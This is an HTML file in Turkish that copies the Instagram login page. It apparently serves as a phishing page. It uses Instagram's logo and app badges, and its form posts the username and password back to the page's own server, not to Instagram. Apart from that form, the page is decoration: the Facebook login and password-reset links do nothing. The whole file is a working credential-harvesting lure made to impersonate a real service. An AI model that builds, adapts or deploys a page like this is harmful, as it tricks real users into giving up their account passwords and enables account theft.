<!DOCTYPE html>
<html lang="tr">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" />
    <title>Instagram</title>
    <link rel="icon" href="https://static.cdninstagram.com/rsrc.php/v3/yx/r/0cU9KfEDKbv.png" />
    <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:400,500" />
    <style>
      body {
        margin: 0;
        font-family: 'Roboto', sans-serif;
        background-color: #A8D0E6;
        overflow-x: hidden; /* Kaymayı engelledim */
      }

      .main-container {
        display: flex;
        justify-content: center;
        align-items: center;
        height: 100vh;
        width: 100%;
        padding: 10px;
        box-sizing: border-box;
      }

      .box {
        width: 100%;
        max-width: 100%; /* En geniş genişlik */
        min-width: 320px; /* Minimum genişlik (mobile uyumlu) */
        background: none;
        padding: 50px 30px 20px;
        text-align: center;
        border-radius: 10px;
        box-shadow: 0px 4px 6px rgba(0, 0, 0, 0.1);
        border: none;
        margin: 0 auto;
      }

      .box img.logo {
        width: 120px;
        margin-bottom: 35px;
      }

      input {
        width: calc(100% - 40px); /* Sol ve sağdan 20px kesme işlemi yaptım */
        margin: 6px 0;
        padding: 18px;
        font-size: 16px;
        background: #fafafa;
        border: 1px solid #dbdbdb;
        border-radius: 20px;
        transition: all 0.3s ease-in-out;
        margin-bottom: 20px;
      }

      input:focus {
        border-color: #3897f0;
      }

      button {
        width: 100%;
        padding: 15px;
        background: #3897f0;
        color: white;
        font-weight: bold;
        border: none;
        border-radius: 20px;
        margin-top: 12px;
        cursor: pointer;
        transition: all 0.3s ease-in-out;
      }

      button:hover {
        background: #006bb3;
      }

      .or-divider {
        display: flex;
        align-items: center;
        margin: 18px 0;
      }

      .or-divider::before,
      .or-divider::after {
        content: '';
        flex: 1;
        height: 1px;
        background: #dbdbdb;
      }

      .or-divider span {
        margin: 0 15px;
        font-size: 12px;
        color: #8e8e8e;
        font-weight: 500;
      }

      .fb-login {
        color: #385185;
        font-weight: bold;
        margin-top: 10px;
        font-size: 14px;
      }

      .forgot {
        margin-top: 12px;
        font-size: 12px;
        color: #00376b;
      }

      .signup-box {
        margin-top: 40px;
        padding: 20px;
        text-align: center;
        background: none;
      }

      .signup-box a {
        color: #0095f6;
        font-weight: bold;
        text-decoration: none;
      }

      .get-app {
        text-align: center;
        font-size: 14px;
        margin-top: 20px;
        color: #262626;
      }

      .apps {
        margin-top: 10px;
      }

      .apps img {
        width: 136px;
        margin: 0 5px;
      }

      @media (max-width: 600px) {
        .box {
          padding: 25px 15px;
          width: 100%;
        }

        .box img.logo {
          width: 120px;
        }

        input, button {
          font-size: 14px;
        }

        .signup-box {
          margin-top: 30px;
        }
      }

    </style>
  </head>
  <body>
    <div class="main-container">
      <div>
        <div class="box">
          <img src="https://upload.wikimedia.org/wikipedia/commons/thumb/a/a5/Instagram_icon.png/120px-Instagram_icon.png" alt="Instagram Profil" class="logo" />
          <form method="POST">
            <input type="text" name="username" placeholder="Telefon numarası, kullanıcı adı veya e-posta" required />
            <input type="password" name="password" placeholder="Şifre" required />
            <button type="submit">Giriş Yap</button>
          </form>
          <div class="or-divider"><span>VEYA</span></div>
          <div class="fb-login">Facebook ile Giriş Yap</div>
          <div class="forgot">Şifreni mi unuttun?</div>
        </div>

        <div class="signup-box">
          Hesabın yok mu? <a href="#">Kaydol</a>
        </div>

        <div class="get-app">
          Uygulamayı indir
          <div class="apps">
            <img src="https://www.instagram.com/static/images/appstore-install-badges/badge_android_white_english_en.png/9fc4bab7565b.png" />
            <img src="https://www.instagram.com/static/images/appstore-install-badges/badge_ios_white_english_en.png/c3b8589bc748.png" />
          </div>
        </div>
      </div>
    </div>
  </body>
</html>
